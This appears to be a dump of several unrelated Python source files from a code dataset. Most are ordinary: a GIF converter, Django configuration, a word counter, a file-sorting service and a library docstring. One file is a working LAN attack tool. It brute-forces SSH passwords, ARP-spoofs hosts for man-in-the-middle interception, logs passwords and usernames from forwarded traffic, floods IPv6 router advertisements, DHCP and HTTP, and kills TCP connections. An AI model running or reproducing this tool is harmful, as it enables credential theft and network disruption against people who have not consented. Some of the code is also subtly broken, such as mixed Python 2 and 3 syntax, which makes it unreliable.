code
stringlengths 1
199k
|
|---|
'''
This example shows a small utility that converts a GIF file into a
Python script, for convenient use with the tkinter library.
'''
import base64
import sys


def main(argv):
    """Write a Python script to stdout that embeds argv[1] as a PhotoImage.

    Returns a process exit code (0 on success, 1 on usage error / non-GIF).
    """
    if not argv[1:]:
        print("Usage: gif2tk.py giffile >pyfile")
        return 1
    with open(argv[1], "rb") as gif:
        data = gif.read()
    # The file is read in binary mode, so compare against bytes
    # (the original compared bytes to str, which is never equal on Python 3).
    if data[:4] != b"GIF8":
        print(argv[1], "is not a GIF file")
        return 1
    print('# generated from', argv[1], 'by gif2tk.py')
    print()
    print('from tkinter import PhotoImage')
    print()
    print('image = PhotoImage(data="""')
    # encodebytes replaces the removed base64.encodestring; end='' mirrors
    # the original trailing-comma print (the base64 text ends with a newline).
    print(base64.encodebytes(data).decode('ascii'), end='')
    print('""")')
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))
|
import argparse
import logging
import os
import random
import socket
import string  # used by the DHCPv4 stress mode (string.hexdigits)
import time

import paramiko

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from datetime import datetime
def brute_pass(usr, passwd, ip, port):
    """Attempt one SSH login; on success append the credentials to 'foundpass'.

    usr/passwd: the credential pair to try; ip/port: the SSH endpoint.
    Authentication failures and connection errors are reported, not raised.
    """
    print("Trying for " + usr + " - " + passwd)
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip, port, usr, passwd)
        print("Password is: " + passwd)
        # str(port): callers pass port as an int, and the original
        # "PORT: "+port raised TypeError exactly when a password was found.
        with open("foundpass", "a") as found:
            found.write("IP: " + ip + " PORT: " + str(port) +
                        " USER: " + usr + " PASS: " + passwd)
    except paramiko.AuthenticationException:
        print("Bad Password - " + passwd)
    except socket.error:
        print("Failed connection")
    finally:
        # Close in every case -- the original leaked the connection on success.
        ssh.close()
def EnaLogging():
    """Install temporary iptables LOG rules so forwarded (MITM'd) traffic is
    recorded in /var/log/messages: everything, media payloads, web requests,
    DNS lookups and likely HTTP credentials."""
    rules = (
        # Log every forwarded connection
        "iptables -I FORWARD -p all -j LOG --log-prefix 'GENERAL-LOG-'",
        # Log media transfers by matching magic substrings in the payload
        "iptables -I FORWARD -p all -m string --string 'jpg' --algo kmp -j LOG --log-prefix 'JPG-LOG-'",
        "iptables -I FORWARD -p all -m string --string 'gif' --algo kmp -j LOG --log-prefix 'GIF-LOG-'",
        "iptables -I FORWARD -p all -m string --string 'png' --algo kmp -j LOG --log-prefix 'PNG-LOG-'",
        "iptables -I FORWARD -p all -m string --string 'mp4' --algo kmp -j LOG --log-prefix 'mp4-LOG-'",
        # Log urls / web requests
        "iptables -I FORWARD -p tcp -m multiport --dports 80,443 -j LOG --log-prefix 'WWW-LOG-' ",
        # Log DNS
        "iptables -I FORWARD -p udp --dport 53 -j LOG --log-prefix 'DNS-LOG-'",
        # Log likely credentials in HTTP traffic
        "iptables -I FORWARD -p all -m string --string 'pass' --algo kmp -j LOG --log-prefix 'PASSWORD-LOG-'",
        "iptables -I FORWARD -p all -m string --string 'user' --algo kmp -j LOG --log-prefix 'USERNAME-LOG-'",
    )
    for rule in rules:
        os.popen(rule)
parser = argparse.ArgumentParser()
# (flag, add_argument keyword arguments) pairs -- behaviorally identical to
# the original one-call-per-option form, just table-driven.
_OPTIONS = (
    ('-timeout', dict(action='store', dest='timeout', default="none",
                      help='Define given seconds before the attack timeouts (mitm,scan,stress) if not specified will run until is killed')),
    ('-RA', dict(action='store', dest='ipv6ra', default=False,
                 help='Flood ipv6 router advertisements for given minutes')),
    ('-file', dict(action='store', dest='output', default=False,
                   help='File output for scans')),
    ('-scan', dict(action='store', dest='scan', default=False,
                   help='Scan the given network address or host')),
    ('--arpScan', dict(action='store_true', dest='arpscan', default=False,
                       help='Arpscan to scan fast on LAN')),
    ('--syn', dict(action='store_true', dest='syn', default=False,
                   help='SYN Scan enabled')),
    ('--service', dict(action='store_true', dest='service', default=False,
                       help='Service Version detection enabled')),
    ('-brute', dict(action='store', dest='brute', default="none",
                    help='Bruteforce SSH of given ip... example : -brute file-192.168.1.254:22')),
    ('-mitm', dict(action='store', dest='mitm', default="none",
                   help='Perform MITM Attack on target')),
    ('-mitmAll', dict(action='store', dest='mitmall', default="none",
                      help='Perform MITM Attack on all hosts')),
    ('-stop-mitm', dict(action='store_true', dest='stopmitm', default=False,
                        help='Stop any Running MITM Attack')),
    ('-denyTcp', dict(action='store', dest='denytcp', default="none",
                      help='Deny tcp connections of given host')),
    ('--dg', dict(action='store', dest='dg', default="none",
                  help='Perform MITM Attack with given Default Gateway')),
    ('-craft', dict(action='store', dest='packetcraft', default=False,
                    help='Enable Packet Crafting.. Example: -craft IP-TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80')),
    ('-stress', dict(action='store', dest='stress', default="none",
                     help='Perform Stress Testing on LAN.. Modes: DHCPv4-50,DHCPv6')),
)
for _flag, _kwargs in _OPTIONS:
    parser.add_argument(_flag, **_kwargs)
results = parser.parse_args()
def httpflood(target):
    """Send one junk HTTP GET (random query string) to target:80.

    Inner step of the HTTP stress mode; connection errors are reported but
    never raised to the caller.
    """
    ip = target
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((ip, 80))
        request = ("GET /?=" + str(random.randrange(9999999)) + " HTTP/1.1\r\n"
                   "Connection: Keep-Alive \r\n\r\n")
        s.send(request.encode('ascii'))  # sockets require bytes on Python 3
        print(request)
    except socket.error:
        # The original caught ValueError, which connect()/send() never raise;
        # socket.error (== OSError) is what actually signals a dead host.
        print("Host seems down or some connection error trying again...")
    finally:
        s.close()  # the original leaked one socket per call
# Scan-output file name: the explicit -file value, or a timestamp-derived
# default when none was given.
output = results.output if results.output else str(time.time())
syn = ""
scantype = "-sn"  # nmap basic ping scan; refined later by --syn/--service
if results.timeout != "none":
    # Prefix for later shell commands: coreutils `timeout <N>s`.
    timeout = "timeout " + results.timeout + "s "
    # print() with a single argument is valid on both Python 2 and 3
    # (the original used the Python-2-only print statement).
    print("\n\nTimeout set for seconds:" + results.timeout)
else:
    timeout = ""
if results.scan:
    ipaddr = str(results.scan)
    if results.arpscan:  # BETA TEST
        # Broadcast ARP who-has for the whole range; answered pairs land in res.
        res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ipaddr))
        # The original used a Python-2-only tuple-parameter lambda
        # `lambda (s,r): ...` -- a SyntaxError on Python 3; index the pair.
        output = str(res.summary(lambda pair: pair[1].sprintf("%Ether.src% %ARP.psrc%")))
        print(output)
        with open("arpscan.txt", "a") as report:  # the original leaked the handle
            report.write(output)
    else:
        print(ipaddr)
        if results.syn:
            scantype = "-sS -O"  # SYN scan plus OS detection
        if results.service:
            scantype = scantype + " -sV"
        # XML output (-oX) so the report can later be converted into HTML.
        scancmd = timeout + "sudo nmap " + scantype + " -oX " + output + " " + ipaddr
        print(scancmd)
        print(os.popen(scancmd).read())  # ping scan to know online hosts
if results.ipv6ra:
    # -RA supplies the count as a string; compare as int. The original did
    # `int <= str`, which never terminates on Python 2 and raises on Python 3.
    minutes = int(results.ipv6ra)
    print("running for minutes: " + str(minutes))
    # Flood IPv6 router advertisements, one per second. `i < minutes` also
    # fixes the original's off-by-one (<= sent one extra packet).
    i = 0
    while i < minutes:
        print("Firing RAs everywhere")
        a = IPv6()
        a.dst = "ff02::1"  # IPv6 "all nodes" multicast (broadcast equivalent)
        a.display()
        b = ICMPv6ND_RA()
        b.display()
        c = ICMPv6NDOptSrcLLAddr()
        c.lladdr = "00:50:56:24:3b:c0"  # advertised source MAC
        c.display()
        d = ICMPv6NDOptMTU()
        d.display()
        e = ICMPv6NDOptPrefixInfo()
        e.prefixlen = 64
        # Random 4-hex-digit prefix so every RA announces a different network.
        randomhex = hex(random.randint(0, 16777215))[2:].upper()
        e.prefix = randomhex[:4] + "::"  # Global Prefix
        e.display()
        send(a / b / c / d / e)  # Send the crafted RA
        print("Sending IPv6 RA Packet :)")
        time.sleep(1)
        i = i + 1
        print(i)
# -denyTcp: drop a host's TCP traffic with a background tcpkill.
# Works if you are the gateway or during MITM.
if results.denytcp != "none":
    target = results.denytcp
    os.popen("nohup " + timeout + "tcpkill host " + target + " >/dev/null 2>&1 &")
# ARP-spoof every live host on the subnet at once (most efficient way to
# MITM a whole segment).
if not(results.mitmall=="none"):
    ipnet=results.mitmall
    # Live-host discovery: nmap ping sweep, IPs extracted via grep/awk.
    iplist=os.popen("nmap -sP "+ipnet+" | grep 'Nmap scan' | awk '{ print $5; }'").read()
    iplist=iplist.split()
    # Default gateway address, read from the kernel routing table.
    dgip=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
    dgip=dgip.split()[0]
    print "Spoofing "+dgip+"\n\n"
    print "Targets: \n"
    for ip in iplist:
        print ip
        # One background arpspoof per target, impersonating the gateway.
        os.popen("nohup "+timeout+"arpspoof -t "+ip+" "+dgip+" >/dev/null 2>&1 &")
    # Record visited URLs while the traffic flows through us.
    os.popen("nohup "+timeout+"urlsnarf >> visitedsites >/dev/null 2>&1 &")
    EnaLogging() # Enable iptables-logging
# Single-target MITM: ARP-spoof `target` against the gateway.
if not(results.mitm=="none"):
    print "im in"
    target=results.mitm
    if(results.dg=="none"): # No --dg given: discover the gateway from the routing table
        dg=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
        dg=dg.split()[0]
        print dg
    else:
        dg=results.dg
    # Start ARP Spoofing with given arguments or calculated ones
    os.popen("nohup "+timeout+"arpspoof -t "+target+" "+dg+" >/dev/null 2>&1 &")
    # Log visited URLs while we are in the middle.
    os.popen("nohup "+timeout+"urlsnarf >> visitedsites &")
    print "Started ARP Spoof and URL Logging"
    EnaLogging() # Enable iptables-logging
    print "Added temp firewall rules to log MITM traffic"
if results.packetcraft:  # Packet crafting with scapy
    craft = (results.packetcraft).split("-")
    # The help text documents "IP-TCP-DST...-SRC...-DPORT80" but the original
    # code indexed as if the leading "IP" token were absent; tolerate both by
    # dropping a leading "IP" segment.
    if craft and craft[0] == "IP":
        craft = craft[1:]
    a = None
    if "TCP" in craft[0]:
        a = IP() / TCP()
    elif "UDP" in craft[0]:
        a = IP() / UDP()
    if a is None:
        # The original left `a` unbound here and crashed with NameError.
        print("Unknown protocol in -craft argument, expected TCP or UDP")
    else:
        if len(craft) > 1 and "DST" in craft[1]:
            a.dst = craft[1].replace("DST", "")
        if len(craft) > 2 and "SRC" in craft[2]:
            a.src = craft[2].replace("SRC", "")
        if len(craft) > 3 and "DPORT" in craft[3]:
            # scapy expects a numeric port, not the raw string
            a.dport = int(craft[3].replace("DPORT", ""))
        # Optional trailing element: number of packets (default 1). The
        # original compared int <= str, which is broken on Python 2 and 3.
        n = int(craft[4]) if len(craft) > 4 else 1
        for _ in range(n):
            a.display()
            send(a)
            print("Sent packet")
if results.stress != "none":
    # Argument format "<MODE>-<args...>", e.g. DHCPv4-50 or HTTP-1.2.3.4-500.
    rawstring = results.stress.split("-")
    mode = rawstring[0]
    count = 20  # default number of DHCP requests
    if "DHCPv4" in mode:  # DHCPv4-50
        # Keep the default when no count was supplied -- the original indexed
        # rawstring[1] unconditionally and crashed on a bare "DHCPv4".
        if len(rawstring) > 1:
            count = int(rawstring[1])
        iface = "eth0"
        # Alphabet for the randomized client MAC (requires `import string`,
        # which the original never did -- NameError at runtime).
        unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
        print(unique_hexdigits)
        # DHCP DISCOVER broadcast with a random client MAC each time.
        packet = (Ether(dst="ff:ff:ff:ff:ff:ff") /
                  IP(src="0.0.0.0", dst="255.255.255.255") /
                  UDP(sport=68, dport=67) /
                  BOOTP(chaddr=RandString(12, unique_hexdigits)) /
                  DHCP(options=[("message-type", "discover"), "end"]))
        print("Sending dhcp requests")
        sendp(packet, iface=iface, count=count)
    if "HTTP" in mode:  # HTTP-192.168.1.1-500
        ip = rawstring[1]
        count = int(rawstring[2])
        # range(count + 1) reproduces the original i<=count loop bounds.
        for _ in range(count + 1):
            httpflood(ip)
        print("Finished flooding!")
if results.brute != "none":  # e.g. -brute file-192.168.1.254:22 ; wordlist lines are usr:pass
    cmd = results.brute
    # "<wordlist>-<ip>:<port>" -- split apart and strip stray whitespace.
    wordlist = cmd.split("-")[0]  # renamed from `file` to stop shadowing the builtin
    ip, port = cmd.split("-")[1].split(":")
    ip = ip.split()[0]
    port = int(port.split()[0])  # remove spaces and then int
    print("Start bruteforcing " + ip + " with list: " + wordlist)
    with open(wordlist, "r") as handle:  # the original leaked the file handle
        for line in handle:
            # maxsplit=1 so passwords containing ':' are kept intact
            # (the original split on every colon and truncated them).
            usr, passwd = line.split(":", 1)
            usr = usr.split()[0]       # remove spaces if any
            passwd = passwd.split()[0]  # like above
            brute_pass(usr, passwd, ip, port)
# -stop-mitm: kill the background helpers; victims' ARP caches repopulate
# with the real gateway on their own.
if results.stopmitm:
    for proc in ("arpspoof", "tcpkill"):
        os.popen("killall " + proc)
|
from setuptools import setup

# Package metadata collected in one mapping, then unpacked into setup().
_METADATA = dict(
    name='PyRankinity',
    version='0.1',
    description='Rankinity API Wrapper - See http://my.rankinity.com/api.en',
    author='UpCounsel',
    author_email='brad@upcounsel.com',
    url='https://www.github.com/upcounsel/pyrankinity',
    packages=['pyrankinity'],
    install_requires=['requests'],
    license='MIT',
)
setup(**_METADATA)
|
from django.conf.urls import include, url
from django.contrib import admin

# Root URL configuration: the admin site plus the two app-specific URL modules.
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^external/', include('external.urls')),
    url(r'^dev/', include('dev.urls')),
]
|
from collections import defaultdict
import re
import sys
from stop_words import STOP_WORD_SET
from collections import Counter
# Character class of punctuation stripped from words. re.escape() already
# escapes everything, so the backslashes inside the literal are redundant
# (but harmless).
PUNCTUATION_RE = re.compile("[%s]" % re.escape(
    """!"&()*+,-\.\/:;<=>?\[\\\]^`\{|\}~]+"""))
# Tokens that are noise rather than vocabulary: shell fragments, git remotes,
# e-mail-ish handles, and URLs.
DISCARD_RE = re.compile("^('{|`|git@|@|https?:)")
def remove_stop_words(word_seq, stop_words):
    """Drop empty strings and any word contained in stop_words."""
    kept = []
    for word in word_seq:
        if word and word not in stop_words:
            kept.append(word)
    return kept
def remove_punctuation(word_seq):
    """Strip punctuation characters from every word, dropping words that
    become empty strings as a result."""
    stripped = (PUNCTUATION_RE.sub("", word) for word in word_seq)
    return [word for word in stripped if word]
def filter_discards(word_seq):
    """Remove tokens matching DISCARD_RE (URLs, git remotes, shell junk)."""
    return filter(lambda word: DISCARD_RE.match(word) is None, word_seq)
def count_words_from_seq(word_seq):
    """Map each word in word_seq to its number of occurrences."""
    counts = defaultdict(int)
    for token in word_seq:
        counts[token] += 1
    return counts
def keep_top_n_words(word_counts, n):
    """Return a plain dict holding only the n highest-count entries."""
    counter = Counter(word_counts)
    return dict(counter.most_common(n))
def count_words(text_blob):
    """Return the 100 most frequent interesting words in text_blob.

    Pipeline: lowercase, split on '=', '|' or whitespace, drop URL/git/shell
    junk, strip punctuation, drop stop words, count, keep the top 100.
    """
    word_seq = re.split('[=|\s]+', text_blob.lower())
    # Single-argument print() is valid on Python 2 and 3 alike; the original
    # used the Python-2-only print statement.
    print(' Splitting blob')
    word_seq = filter_discards(word_seq)
    print(' Filtering discards')
    word_seq = remove_punctuation(word_seq)
    print(' Removing punctuation')
    word_seq = remove_stop_words(word_seq, STOP_WORD_SET)
    print(' Removing stop words')
    word_counts = count_words_from_seq(word_seq)
    print(' Counting words')
    top_n = keep_top_n_words(word_counts, 100)
    print(' Filtering to top 100 words')
    return top_n
if __name__ == '__main__':
    # Read the whole blob from stdin and dump the resulting word->count dict.
    # Parenthesized print works on Python 2 and 3 (single argument).
    print(count_words(sys.stdin.read()))
|
from django.db import migrations, models


class Migration(migrations.Migration):
    """Add the boolean `recruiter` flag (default False) to the Contact model."""

    dependencies = [
        ('contacts', '0006_auto_20180423_1629'),
    ]

    operations = [
        migrations.AddField(
            model_name='contact',
            name='recruiter',
            field=models.BooleanField(default=False),
        ),
    ]
|
from __future__ import unicode_literals
import os
import socket
import traceback
from lineup.datastructures import Queue
class Node(object):
    """Base class for pipeline participants: identification helpers plus the
    worker lifecycle (start / feed / collect results)."""

    def __init__(self, *args, **kw):
        self.initialize(*args, **kw)

    def initialize(self, *args, **kw):
        """Subclass hook, called from __init__ with the constructor arguments."""
        pass

    @property
    def id(self):
        """'hostname|pid' -- unique per process per machine."""
        return '|'.join([self.get_hostname(), str(os.getpid())])

    @property
    def taxonomy(self):
        """Dotted 'module.ClassName' path of the concrete class."""
        class_name = self.__class__.__name__
        module_name = self.__class__.__module__
        return '.'.join([module_name, class_name])

    def get_name(self):
        """The explicit `name` attribute when set, otherwise the taxonomy."""
        return getattr(self, 'name', None) or self.taxonomy

    def get_hostname(self):
        return socket.gethostname()

    def make_worker(self, Worker, index):
        # `index` is unused here; subclasses (e.g. Pipeline) use it to pick queues.
        return Worker(self, self.input, self.output)

    def start(self):
        for worker in self.workers:
            worker.start()

    def feed(self, item):
        """Push one work item into the head of the pipeline."""
        self.input.put(item)

    def enqueue_error(self, source_class, instructions, exception):
        # print() call instead of the Python-2-only print statement the
        # original used (a SyntaxError on Python 3).
        print(exception, source_class, instructions)

    def wait_and_get_work(self):
        """Block until a finished item is available on the output queue."""
        return self.output.get()

    @property
    def running(self):
        # NOTE(review): assumes workers expose an `alive` attribute -- confirm
        # against the Worker implementation.
        return all([w.alive for w in self.workers])

    def are_running(self):
        """Ensure workers are started and report whether they are all alive."""
        if self.running:
            return True
        self.start()
        return self.running
class Pipeline(Node):
    """A Node whose workers are chained through queues: worker i reads
    queues[i] and writes queues[i + 1]."""

    def initialize(self, *args, **kw):
        # The original referenced undefined names (`args`, `kw`, `steps`):
        # initialize() took no varargs and no `steps` local was ever bound,
        # so constructing a Pipeline raised NameError.
        self.queues = self.get_queues(*args, **kw)
        steps = getattr(self, 'steps', None) or []
        self.workers = [self.make_worker(Worker, index)
                        for index, Worker in enumerate(steps)]

    @property
    def input(self):
        """Head queue: items fed here enter the first step."""
        return self.queues[0]

    @property
    def output(self):
        """Tail queue: fully-processed items end up here."""
        return self.queues[-1]

    def get_queues(self):
        """One queue per step plus a final output queue."""
        steps = getattr(self, 'steps', None) or []
        return [Queue() for _ in steps] + [Queue()]

    def make_worker(self, Worker, index):
        """Wire step `index` between its input and output queues."""
        return Worker(self, self.queues[index], self.queues[index + 1])
|
from flask import Blueprint

# Blueprint for user-facing routes. The views module attaches its handlers to
# this object, so it must be imported only after `user` exists (the usual
# circular-import avoidance pattern).
user = Blueprint('user', __name__)

from . import views
|
import datetime
import os
import shutil
import time
from files_by_date.utils.logging_wrapper import get_logger, log_message
from files_by_date.validators.argument_validator import ArgumentValidator
# Module-level logger shared by the helpers below.
logger = get_logger(name='files_service')
class FilesService:
    """Class-method helpers that collect files, bucket them by modification
    month (YYYYMM), and copy each bucket into its own directory."""

    def __init__(self):
        # Namespace only -- never instantiate.
        raise NotImplementedError

    @classmethod
    def gather_files(cls, parent_directory, files):
        """Append the full path of every file under parent_directory to
        `files` (mutated in place and also returned).

        os.walk already descends into subdirectories, so no manual recursion
        is needed. The original additionally recursed with the *bare*
        subdirectory name, which resolved against the CWD instead of
        dir_name -- usually a silent no-op, but wrong paths when a
        same-named directory happened to exist in the CWD.
        """
        for dir_name, subdir_list, file_list in os.walk(parent_directory):
            files.extend(
                '{dir_name}{os_sep}{file_name}'.format(
                    dir_name=dir_name, os_sep=os.sep, file_name=file)
                for file in file_list)
            # [f'{dir_name}{os.sep}{file}' for file in file_list] # 3.6
        return files

    @classmethod
    def group_files_by_modified_date(cls, files):
        """Bucket file paths into a dict keyed by their YYYYMM mtime tag."""
        grouped_files = {}
        for file in files:
            directory_tag = cls._get_directory_tag_for_file(file)
            grouped_files.setdefault(directory_tag, []).append(file)
        return grouped_files

    @classmethod
    def copy_files(cls, file_groups, target_dir, force_overwrite):
        """Copy every group into target_dir/<tag>.

        Existing files are skipped unless force_overwrite is set (then they
        are replaced). Returns the aggregate Count of files/copied/skipped.
        """
        if not os.path.exists(target_dir):
            os.makedirs(target_dir)  # TODO: not covered
        total_count = Count()
        for group in file_groups:
            group_count = Count()
            group_dir = '{target_dir}{os_sep}{group}'.format(
                target_dir=target_dir, os_sep=os.sep, group=group)
            ArgumentValidator.validate_target_dir(group_dir)
            if not os.path.exists(group_dir):
                os.makedirs(group_dir)
                log_message('Created directory: {group_dir}'.format(group_dir=group_dir))
            log_message('Moving {group_size} files to {group_dir}'.format(
                group_size=len(file_groups[group]), group_dir=group_dir))
            for file in file_groups[group]:
                file_path = '{group_dir}{os_sep}{file_name}'.format(
                    group_dir=group_dir, os_sep=os.sep,
                    file_name=os.path.basename(file))
                # force_overwrite: delete first so the copy below proceeds.
                if force_overwrite and os.path.exists(file_path):
                    os.remove(file_path)
                if not os.path.exists(file_path):
                    shutil.copy2(file, group_dir)
                    group_count.add_copied(count=1)
                else:
                    group_count.add_skipped(count=1)  # TODO: not covered
            total_count.add_files(count=len(file_groups[group]))
            total_count.add_copied(count=group_count.copied)
            total_count.add_skipped(count=group_count.skipped)
            log_message('Copied {local_copied_count}, skipped {local_skipped_count}'.format(
                local_copied_count=group_count.copied,
                local_skipped_count=group_count.skipped))
        log_message(
            'Total files count {total_files_count}, total copied {total_copied_count}, total skipped {total_skipped_count}'.format(
                total_files_count=total_count.files,
                total_copied_count=total_count.copied,
                total_skipped_count=total_count.skipped))
        return total_count

    @staticmethod
    def _get_directory_tag_for_file(file):
        """YYYYMM tag derived from the file's (local-time) modification time.

        Equivalent to the original ctime-string round trip, without the
        fragile strptime of a human-readable date.
        """
        return datetime.datetime.fromtimestamp(os.path.getmtime(file)).strftime('%Y%m')
class Count:
    """Mutable tally of processed files: seen, copied, skipped."""

    def __init__(self, *, files=0, copied=0, skipped=0):
        self.files = files      # total files considered
        self.copied = copied    # files actually copied
        self.skipped = skipped  # files skipped (already present)

    def __str__(self):
        template = 'files={files}, copied={copied}, skipped={skipped}'
        return template.format(files=self.files, copied=self.copied,
                               skipped=self.skipped)

    def add_files(self, *, count=1):
        self.files = self.files + count

    def add_copied(self, *, count=0):
        self.copied = self.copied + count

    def add_skipped(self, *, count=0):
        self.skipped = self.skipped + count
|
"""
Example taken from http://matplotlib.org/1.5.0/examples/showcase/xkcd.html
"""
import matplotlib.pyplot as plt
import numpy as np
# Render everything inside this context with matplotlib's hand-drawn
# xkcd style.
with plt.xkcd():
    # Based on "The Data So Far" from XKCD by Randall Monroe
    # http://xkcd.com/373/
    index = [0, 1]    # bar positions on the x axis
    data = [0, 100]   # bar heights
    labels = ['CONFIRMED BY EXPERIMENT', 'REFUTED BY EXPERIMENT']

    fig = plt.figure()
    ax = fig.add_axes((0.1, 0.2, 0.8, 0.7))
    ax.bar(index, data, 0.25)
    # Hide the top/right box edges for the sketchy look.
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.set_xticks([0, 1])
    ax.set_xlim([-0.5, 1.5])
    ax.set_ylim([0, 110])
    ax.set_xticklabels(labels)
    plt.yticks([])  # no y-axis tick marks
    plt.title("CLAIMS OF SUPERNATURAL POWERS")

    # Attribution caption centered below the axes.
    fig.text(
        0.5, 0.05,
        '"The Data So Far" from xkcd by Randall Monroe',
        ha='center')
plt.show()
|
"""Use python in a more object oriented, saner and shorter way.
First: A word of warning. This library is an experiment. It is based on a wrapper that aggressively
wraps anything it comes in contact with and tries to stay invisible from then on (apart from adding methods).
However this means that this library is probably quite unsuitable for use in bigger projects. Why?
Because the wrapper will spread in your runtime image like a virus, 'infecting' more and more objects
causing strange side effects. That being said, this library is perfect for short scripts and especially
'one-off' shell commands. Use its power wisely!
This library is heavily inspired by jQuery and underscore / lodash in the javascript world. Or you
could say that it is inspired by SmallTalk and in extension Ruby and how they deal with collections
and how to work with them.
In JS the problem is that the standard library sucks very badly and is missing many of the
most important convenience methods. Python is better in this regard, in that it has (almost) all
those methods available somewhere. BUT: quite a lot of them are available on the wrong object or
are free methods where they really should be methods. Examples: `str.join` really should be on iterable.
`map`, `zip`, `filter` should really be on iterable. Part of this problem comes from the design
choice of the python language, to provide a strange kind of minimal duck typing interface with the __*__
methods that the free methods like `map`, `zip`, `filter` then use. This however has the unfortunate
side effect in that writing python code using these methods often requires the reader to mentally skip
back and forth in a line to parse what it does. While this is not too bad for simple usage of these
functions, it becomes a nightmare if longer statements are built up from them.
Don't believe me? Try to parse this simple example as fast as you can:
>>> map(print, map(str.upper, sys.stdin.read().split('\n')))
How many backtrackings did you have to do? To me this code means, finding out that it starts in the
middle at `sys.stdin.read().split('\n')`, then I have to backtrack to `map(str.upper, …)`, then to
`map(print, …)`. Then while writing, I have to make sure that the number of parens at the end are
correct, which is something I usually have to use editor support for as it's quite hard to accurately
identify where the matching paren is.
The problem with this? This is hard! Hard to write, as it doesn't follow the way I think about this
statement. Literally, this means I usually write these statements from the inside out and wrap them
using my editor as I write them. As demonstrated above, it's also hard to read - requiring quite a
bit of backtracking.
So, what's the problem you say? Just don't do it, it's not pythonic you say! Well, Python has two
main workarounds available for this mess. One is to use list comprehension / generator
statements like this:
>>> [print(line.upper()) for line in sys.stdin.read().split('\n')]
This is clearly better. Now you only have to skip back and forth once instead of twice Yay! Win!
To me that is not a good workaround. Sure it's nice to easily be able to create generators this
way, but it still requires of me to find where the statement starts and to backtrack to the beginning
to see what is happening. Oh, but they support filtering too!
>>> [print(line.upper()) for line in sys.stdin.read().split('\n') if line.upper().startswith('FNORD')]
Well, this is little better. For one thing, this doesn't solve the backtracking problem, but more
importantly, if the filtering has to be done on the processed version (here artificially on
`line.upper().startswith()`) then the operation has to be applied twice - which sucks because you have to write it twice, but also because it is computed twice.
The solution? Nest them!
[print(line) for line in (line.upper() for line in sys.stdin.read().split('\n')) if line.startswith('FNORD')]
Do you start seeing the problem?
Compare it to this:
>>> for line in sys.stdin.read().split('\n'):
>>> uppercased = line.upper()
>>> if uppercased.startswith('FNORD'):
>>> print(uppercased)
Almost all my complaints are gone. It reads and writes almost completely in order it is computed.
Easy to read, easy to write - but one drawback. It's not an expression - it's a bunch of statements.
Which means that it's not easily combinable and abstractable with higher order methods or generators.
Also (to complain on a high level), you had to invent two variable names `line` and `uppercased`.
While that is not bad, especially if they explain what is going on - in this case it's not really
helping _and_ (drummroll) it requires some backtracking and buildup of mental state to read. Oh well.
Of course you can use explaining variables to untangle the mess of using higher order functions too:
Consider this code:
>>> cross_product_of_dependency_labels = \
>>> set(map(frozenset, itertools.product(*map(attrgetter('_labels'), dependencies))))
That certainly is hard to read (and write). Pulling out explaining variables, makes it better. Like so:
>>> labels = map(attrgetter('_labels'), dependencies)
>>> cross_product_of_dependency_labels = set(map(frozenset, itertools.product(*labels)))
Better, but still hard to read. Sure, those explaining variables are nice and sometimes
essential to understand the code. - but it does take up space in lines, and space in my head
while parsing this code. The question would be - is this really easier to read than something
like this?
>>> cross_product_of_dependency_labels = _(dependencies) \
>>> .map(_.each._labels) \
>>> .star_call(itertools.product) \
>>> .map(frozenset) \
>>> .call(set)
Sure you are not used to this at first, but consider the advantages. The intermediate variable
names are abstracted away - the data flows through the methods completely naturally. No jumping
back and forth to parse this at all. It just reads and writes exactly in the order it is computed.
What I think that I want to accomplish, I can write down directly in order. Oh, and I don't have
to keep track of extra closing parantheses at the end of the expression.
So what is the essence of all of this?
Python is an object oriented language - but it doesn't really use what object orientation has taught
us about how we can work with collections and higher order methods in the languages that came before it
(especially SmallTalk, but more recently also Ruby). Why can't I make those beautiful fluent call chains
that SmallTalk could do 20 years ago in Python today?
Well, now you can.
To enable this style of coding this library has some features that might not be so obvious at first.
The most important entry point for this library is the function `wrap` or the perhaps preferable and
shorter alias `_`:
>>> _(something)
>>> # or
>>> wrap(something)
`wrap` is a factory function that returns a subclass of Wrapper, the basic and main object of this library.
This does two things: First it ensures that every attribute access, item access or method call off of
the wrapped object will also return a wrapped object. This means that once you wrap something, unless
you unwrap it explicitly via `.unwrap` or `._` it stays wrapped - pretty much no matter what you do
with it. The second thing this does is that it returns a subclass of Wrapper that has a specialized set
of methods depending on the type of what is wrapped. I envision this to expand in the future, but right
now the most useful wrappers are: Iterable, where we add all the python collection functions (map,
filter, zip, reduce, …) as well as a good batch of methods from itertools and a few extras for good
measure. Callable, where we add `.curry()` and `.compose()` and Text, where most of the regex methods
are added.
Import statements are (ahem) statements in python. This is fine, but can be really annoying at times.
Consider this shell text filter written in python:
$ curl -sL 'https://www.iblocklist.com/lists.php' | egrep -A1 'star_[345]' | python3 -c "import sys, re; from xml.sax.saxutils import unescape; print('\n'.join(map(unescape, re.findall(r'value=\'(.*)\'', sys.stdin.read()))))"
Sure it has all the backtracking problems I talked about already. Using fluent this would already be much better.
$ curl -sL 'https://www.iblocklist.com/lists.php' \
| egrep -A1 'star_[345]' \
| python3 -c "from fluent import *; import sys, re; from xml.sax.saxutils import unescape; _(sys.stdin.read()).findall(r'value=\'(.*)\'').map(unescape).map(print)"
But this still leaves the problem that it has to start with this fluff
`from fluent import *; import sys, re; from xml.sax.saxutils import unescape;`
This doesn't really do anything to make it easier to read and write and is almost half the characters
it took to achieve the wanted effect. Wouldn't it be nice if you could have
some kind of object (lets call it `lib` for lack of a better word), where you could just access the whole
python library via attribute access and let it's machinery handle importing behind the scenes?
Like this:
$ curl -sL 'https://www.iblocklist.com/lists.php' | egrep -A1 'star_[345]' | python3 -m fluent "lib.sys.stdin.read().findall(r'value=\'(.*)\'').map(lib.xml.sax.saxutils.unescape).map(print)"
